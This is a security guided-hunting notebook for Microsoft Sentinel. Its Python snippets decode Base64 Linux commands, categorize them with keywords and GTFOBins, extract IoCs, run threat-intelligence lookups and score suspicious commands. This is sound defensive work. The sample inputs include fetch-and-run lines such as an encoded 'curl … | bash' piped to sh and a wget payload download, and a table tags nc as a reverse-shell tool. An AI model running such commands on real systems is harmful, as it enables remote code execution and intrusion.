Guided Hunting - Base64-Encoded Linux Commands
Notebook Version: 1.0
Python Version: Python 3.6 (including Python 3.6 - AzureML)
Required Packages: kqlmagic, msticpy, pandas, numpy, matplotlib, networkx, seaborn, datetime, ipywidgets, ipython, dnspython, folium, maxminddb_geolite2, BeautifulSoup
Data Sources Required:
Log Analytics/Microsoft Sentinel - Syslog, Security Alerts, Auditd, Azure Network Analytics.
VirusTotal, AlienVault OTX, and IBM XForce each require an account and an API key, both of which are free to create on their respective websites. If you would rather use only one provider, or prefer one over the others, the following sections give further instructions.
This notebook is a collection of tools for detecting malicious behavior when commands are Base64-encoded. It allows you to specify a workspace and time frame and will score and rank Base64 commands within those bounds.
It utilizes multiple data sources, primarily focusing on Microsoft Sentinel Syslog data augmented by telemetry from the MSTIC research branch of the AUOMS audit collection tool. Make sure to install this agent and connect your virtual machines with Microsoft Sentinel before using this notebook. For more on this, please see this blog post.
This notebook also uses data from GTFOBins, a list of Unix binaries that can be exploited by attackers. These bash commands are labeled with preliminary functions that can help an investigator better understand what a command does.
Finally, we use threat intelligence (TI) from AlienVault OTX, VirusTotal, and IBM XForce to highlight Base64 commands that contain known indicators.
Table of Contents
Notebook Setup
The next cell:
Checks for the correct Python version
Checks versions and optionally installs required packages
Imports the required packages into the notebook
Sets a number of configuration options.
This should complete without errors. If you encounter errors or warnings, look at the following two notebooks:
If you are running in the Microsoft Sentinel Notebooks environment (Azure Notebooks or Azure ML) you can run live versions of these notebooks:
You may also need to do some additional configuration to successfully use functions such as Threat Intelligence service lookup and Geo IP lookup. There are more details about this in the ConfiguringNotebookEnvironment notebook and in these documents:
msticpy configuration: the msticpyconfig.yaml file is found in the same folder as this notebook (Microsoft Sentinel Notebooks).
If you are unfamiliar with Jupyter notebooks, or want a more in-depth setup reference, check out these resources:
Connect to Log Analytics
Run the cells below to connect to your Log Analytics workspace. If you haven't already, please fill in the relevant information in msticpyconfig.yaml. This file is found in the Microsoft Sentinel Notebooks folder this notebook is in. There is more information on how to do this in the Notebook Setup section above. You may need to restart the kernel after doing so and rerun any cells you've already run to update to the new information.
If you are unfamiliar with connecting to Log Analytics or want a more in-depth walkthrough, check out the Getting Started with Microsoft Sentinel Notebook.
Set Time Parameters
Run the cell below, then use the sliding bar that pops up to adjust the time frame in which you want the query to find Base64 commands.
Decide the time frame of your query
Get Base64 Commands
The following cell queries your Log Analytics workspace for all Base64 commands in the given time frame. It draws on the AUOMS_EXECVE logs, which are discussed in the blog post mentioned earlier. The rest of the notebook runs on this data. The query is written in KQL. If you would like to add information to the query results, you may do so here. Note that the following cells rely on this output, so the original columns must still be projected.
If you prefer to use a different log (not AUOMS_EXECVE), you may write your own query and will potentially have to edit certain values throughout the rest of the notebook to get the correct values and data frames.
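Whatever log you query, the later cells need a decoded form of each command. The following is a minimal sketch of that decoding step, not the notebook's own code: the function name, the regular expression, and the 16-character minimum length are assumptions chosen for illustration.

```python
import base64
import binascii
import re

# Runs of 16+ Base64 alphabet characters with optional padding. The minimum
# length is an assumed threshold to avoid matching ordinary short words.
B64_CANDIDATE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_base64_fragments(command_line):
    """Return the decoded text of every plausible Base64 fragment in a command line."""
    decoded = []
    for candidate in B64_CANDIDATE.findall(command_line):
        if len(candidate) % 4 != 0:
            continue  # padded Base64 always has a length divisible by 4
        try:
            raw = base64.b64decode(candidate, validate=True)
            decoded.append(raw.decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # not Base64, or not text once decoded
    return decoded


# Build a sample command line the way an attacker might wrap a payload.
payload = base64.b64encode(b"curl http://example.com/a.sh | bash").decode("ascii")
sample = f"echo {payload} | base64 -d | sh"
decoded_commands = decode_base64_fragments(sample)
```

Strict validation plus the UTF-8 check discards most strings that merely look like Base64, at the cost of missing payloads that decode to binary data.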
Basic Command Categorization
We will be categorizing commands in two ways: this cell categorizes commands by looking for commonly used commands we are aware of. The next section will use an open source compilation.
This cell categorizes each decoded Base64 command by functionality based on what bash commands are present in the decoded version. For example, commands with "wget" or "curl" in them are categorized as "Network connections/Downloading." Other categories include "File Manipulation", "Host Enumeration", and "File/Process deletion/killing."
This categorization is by no means exhaustive. Feel free to add your own commands and categories to this basic set.
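A keyword-based categorizer of this kind might look like the sketch below. The category names come from the description above, but the keyword lists (apart from wget and curl) and the function name are assumptions made for illustration.

```python
import re

# Category names follow the text; the keyword lists are illustrative assumptions.
CATEGORY_KEYWORDS = {
    "Network connections/Downloading": ["wget", "curl"],
    "File Manipulation": ["chmod", "chown", "touch"],
    "Host Enumeration": ["whoami", "uname", "hostname"],
    "File/Process deletion/killing": ["rm", "kill", "pkill"],
}


def categorize(decoded_command):
    """Return every category whose keywords appear as whole tokens in the command."""
    tokens = set(re.findall(r"[A-Za-z0-9_.-]+", decoded_command))
    return [
        category
        for category, keywords in CATEGORY_KEYWORDS.items()
        if tokens & set(keywords)
    ]


categories = categorize("curl http://example.com/a.sh | bash; rm -f /tmp/a.sh")
```

Matching on whole tokens rather than substrings is a design choice in this sketch: it keeps a short keyword such as rm from matching inside an unrelated word such as firmware.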
GTFO Bins Classification
This cell categorizes the commands based on GTFOBins. GTFOBins is a vetted collection of bash commands frequently exploited by attackers as well as a reference as to how those commands may be used. We are using it to find potentially exploited commands in the dataset and tag those with their corresponding functionalities.
Run the cell below to read about what each category means according to the GTFOBins website.
The following cell tags commands with GTFOBins bins and functions and displays the dataframe again for viewing. You may click on the links in the 'GTFO Bins' column for easy access to the GTFOBins website and more information.
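As a rough sketch of the tagging step, the code below matches command tokens against a small table and builds a link for each hit. The table is a hand-written, incomplete subset for illustration only, and the function names, tag spellings, and URL layout are assumptions; a real run should load the current data from the GTFOBins project instead.

```python
import re

# Assumed URL layout for a binary's page on the GTFOBins website.
GTFOBINS_BASE_URL = "https://gtfobins.github.io/gtfobins"

# Hand-written, incomplete subset for illustration; not the full GTFOBins data.
GTFOBINS_SUBSET = {
    "wget": ["file-download", "file-upload"],
    "curl": ["file-download", "file-upload"],
    "nc": ["reverse-shell", "bind-shell"],
}


def tag_gtfobins(decoded_command):
    """Map each known binary found in the command to its functions and a link."""
    tags = {}
    for token in re.findall(r"[A-Za-z0-9_.-]+", decoded_command):
        if token in GTFOBINS_SUBSET and token not in tags:
            tags[token] = {
                "functions": GTFOBINS_SUBSET[token],
                "link": f"{GTFOBINS_BASE_URL}/{token}/",
            }
    return tags


tags = tag_gtfobins("wget http://example.com/x -O /tmp/x")
```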
Generate Scores and Rankings
The following sections generate scores for each unique Base64 command based on criteria such as frequency of the command, severity of TI lookup results, and related commands run. Each score is added to the dataframe at the end, so you can view and rank each individually or by the aggregate score.
Scores are heuristic and are meant to help investigators highlight commands that are more likely to be malicious. They have no absolute meaning and are only comparable with each other: a higher score indicates a command that is more likely to be malicious.
Frequency Analysis
The cell below creates a frequency score for each unique Base64 command by calculating (1 / # times command occurred in the workspace). It then adds a second score calculated by (1 / # times command occurred on its host computer). Both of these scores are divided by 2 for normalization purposes, so the combined frequency score never exceeds 1.
This results in rarer commands getting higher scores.
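The calculation can be sketched in plain Python as follows. The function name and the (computer, command) tuple layout are assumptions; the notebook itself works on a dataframe.

```python
from collections import Counter


def frequency_scores(events):
    """Score each (computer, command) pair; events holds one tuple per execution."""
    workspace_counts = Counter(command for _, command in events)
    host_counts = Counter(events)
    scores = {}
    for computer, command in set(events):
        workspace_part = (1 / workspace_counts[command]) / 2
        host_part = (1 / host_counts[(computer, command)]) / 2
        scores[(computer, command)] = workspace_part + host_part
    return scores


events = [
    ("host-a", "cmd1"), ("host-a", "cmd1"),
    ("host-b", "cmd1"), ("host-b", "cmd1"),
    ("host-b", "cmd2"),
]
scores = frequency_scores(events)
```

Here cmd1 runs four times in the workspace and twice on each host, so it scores 0.125 + 0.25 = 0.375, while cmd2 runs once and receives the maximum score of 1.0.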
Extract IoCs
The cell below extracts any IoCs from the decoded Base64 commands and adds them to the dataframe. It uses the MSTICpy IoC extraction features, which extract the following patterns:
ipv4
ipv6
dns
url
windows_path
linux_path
md5_hash
sha1_hash
sha256_hash
If you want to look for an IoC pattern that is not included here, feel free to modify the MSTICpy class. See this link for more information.
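To make the idea of pattern-based extraction concrete, here is a simplified stand-in that uses only the standard library. It is not MSTICpy's implementation: the three regular expressions are rough assumptions that cover only some of the types listed above, and the function name is hypothetical.

```python
import re

# Simplified, assumed patterns; MSTICpy's own expressions are more thorough.
SIMPLE_IOC_PATTERNS = {
    "ipv4": re.compile(
        r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
    ),
    "url": re.compile(r"\bhttps?://[^\s'\"|;]+"),
    "md5_hash": re.compile(r"\b[a-fA-F0-9]{32}\b"),
}


def extract_iocs(text):
    """Return {ioc_type: sorted unique matches} for every pattern that matches."""
    found = {}
    for ioc_type, pattern in SIMPLE_IOC_PATTERNS.items():
        matches = sorted(set(pattern.findall(text)))
        if matches:
            found[ioc_type] = matches
    return found


iocs = extract_iocs("wget http://203.0.113.7/payload.sh -O /tmp/p.sh")
```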
Threat Intelligence Lookup
Load and run TILookup on the IoCs found. Make sure you configure msticpyconfig.yaml with the appropriate TI sources. Check out the document below if you need help with this process.
We highly encourage you to add TI sources, but if you don't have any (i.e. API keys from AlienVault OTX, IBM XForce, or VirusTotal) and don't want to make accounts, you can skip this section and go directly to Related Alerts Scoring below. In that case, your rankings will be based exclusively on frequency scores and related alerts scoring.
Confirm TI Sources
The code below prints your current TI lookup configuration.
Choose which providers you would like to use during the TI lookup. These must be configured in msticpyconfig.yaml. Additional directions are given above in the Notebook Setup section.
Choose IoCs to look up
You can choose IoCs you're interested in to look up or look up all of them for scoring. Scores will be based exclusively on the Severity column. The following cells will also print a TI dataframe with added information.
Run this cell to look up the selected IoCs above.
Calculate TI Severity Scores
The following cell takes, for each IoC, the most severe rating returned by any provider and adds it to the command's score. The more severe the IoC, the higher the score the command receives. Each unique IoC found adds to the score of that command.
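A minimal sketch of this rule is shown below. The severity labels, the points assigned to each label, the provider names used as strings, and the function name are all assumptions for illustration; the notebook's actual weights may differ.

```python
# Assumed mapping from a provider's severity label to points.
SEVERITY_POINTS = {"information": 0, "warning": 1, "high": 2}


def ti_severity_score(lookup_rows):
    """Sum, over unique IoCs, the worst severity any provider reported.

    lookup_rows is an iterable of (ioc, provider, severity) tuples.
    """
    worst_by_ioc = {}
    for ioc, _provider, severity in lookup_rows:
        points = SEVERITY_POINTS.get(severity, 0)  # unknown labels add nothing
        worst_by_ioc[ioc] = max(worst_by_ioc.get(ioc, 0), points)
    return sum(worst_by_ioc.values())


rows = [
    ("203.0.113.7", "OTX", "warning"),
    ("203.0.113.7", "VirusTotal", "high"),
    ("example.com", "XForce", "information"),
]
ti_score = ti_severity_score(rows)
```

The IP address is counted once at its worst rating (high, 2 points) and the domain adds nothing, giving a TI score of 2.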
Related Alerts
This section searches for any related Sentinel alerts on the hosts we've found Base64 commands on in the given time frame.
Points are added to the score depending on the severity of the alerts that occurred at this time. For example, high severity alerts around the Base64 commands will result in a higher score for those commands. Each unique alert's score is only added once. Alert information as well as timeline visualizations will also be printed out to provide context and enable further investigation. Be sure to scroll for information on all the hosts.
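The rule that each unique alert counts once can be sketched as follows. The points per severity level, the (alert_id, severity) tuple layout, and the function name are assumptions for illustration.

```python
# Assumed points per alert severity level.
ALERT_POINTS = {"Low": 1, "Medium": 2, "High": 3}


def related_alert_score(alerts):
    """Add points for each unique alert; alerts is an iterable of (alert_id, severity)."""
    seen = set()
    score = 0
    for alert_id, severity in alerts:
        if alert_id in seen:
            continue  # the same alert must not be counted twice
        seen.add(alert_id)
        score += ALERT_POINTS.get(severity, 0)
    return score


alert_score = related_alert_score([("a1", "High"), ("a1", "High"), ("a2", "Low")])
```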
View the score again by running the cell below.
Final Scores and Rankings
Run the cell below to choose the columns you would like to view. You must select TotalScore for rankings to work.
Run this cell to display the columns you chose above. Score columns are shaded red, with the intensity showing what share of the total score each type of score contributes and how it compares with other commands' scores.
You can also choose to only view data with numerical columns over a given cutoff by selecting a column and choosing a cutoff point.
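The aggregation, cutoff, and ranking steps can be sketched on plain dictionaries as shown below. TotalScore is the column named above; the other column names and the function name are hypothetical.

```python
def rank_commands(rows, cutoff_column, cutoff):
    """Add TotalScore, keep rows over the cutoff, and sort by TotalScore descending."""
    scored = []
    for row in rows:
        # The three component column names are assumptions for this sketch.
        total = row["FrequencyScore"] + row["TIScore"] + row["AlertScore"]
        scored.append({**row, "TotalScore": total})
    kept = [row for row in scored if row[cutoff_column] > cutoff]
    return sorted(kept, key=lambda row: row["TotalScore"], reverse=True)


rows = [
    {"Command": "a", "FrequencyScore": 1.0, "TIScore": 2, "AlertScore": 0},
    {"Command": "b", "FrequencyScore": 0.375, "TIScore": 0, "AlertScore": 3},
    {"Command": "c", "FrequencyScore": 0.25, "TIScore": 0, "AlertScore": 0},
]
ranked = rank_commands(rows, cutoff_column="TotalScore", cutoff=1.0)
```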
You can use the following bar chart to view the composition of each score visually. The horizontal axis represents the index of the command in the data frame, so you can reference the data frame above for context around any interesting data you see.
Behavior Timeline
This timeline visualizes when commands occurred to identify potential windows of activity.
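If you want the same information without a plot, one simple approach is to count commands per hour and look for hours with unusually many. This is a sketch under assumptions: the function name and the one-hour bucket size are illustrative choices, not part of the notebook.

```python
from collections import Counter
from datetime import datetime


def hourly_activity(timestamps):
    """Count commands per clock hour and return (hour, count) pairs in time order."""
    buckets = Counter(
        ts.replace(minute=0, second=0, microsecond=0) for ts in timestamps
    )
    return sorted(buckets.items())


timestamps = [
    datetime(2020, 6, 1, 10, 5),
    datetime(2020, 6, 1, 10, 40),
    datetime(2020, 6, 1, 14, 15),
]
activity = hourly_activity(timestamps)
```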